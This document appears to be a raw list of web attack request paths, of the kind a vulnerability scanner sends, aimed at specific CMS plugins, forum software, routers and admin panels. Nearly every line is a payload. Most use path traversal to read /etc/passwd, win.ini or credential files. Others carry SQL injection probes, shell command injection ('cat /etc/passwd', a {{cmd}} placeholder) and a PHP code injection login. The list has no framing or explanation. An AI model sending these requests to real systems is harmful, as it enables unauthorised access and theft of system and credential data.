/index.php?option=com_imagebrowser&folder=../../../../etc/passwd
/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22
/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00
/webadmin/clientlogin/?srid=&action=showdeny&url=
/wlsecurity.html
/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/services/getFile.cmd?userfile=config.xml
/rest/v1/AccountService/Accounts
/CMSInstall/install.aspx
/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd
/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini
/html/log
/../../etc/passwd
/filemanager/upload.php
/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd
/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd
/wp-admin/options-general.php?page=smartcode
/user/scripts/login_par.js
/device.rsp?opt=user&cmd=list
/pages/systemcall.php?command=cat%20/etc/passwd
/cgi-bin/file_transfer.cgi
/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd
/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd
/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd
/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{cmd}}
/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1
/logs/downloadMainLog?fname=../../../../../../..//etc/passwd
/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json
/jquery-file-upload/server/php/
/rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc
/mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27
/?s=index/index/index
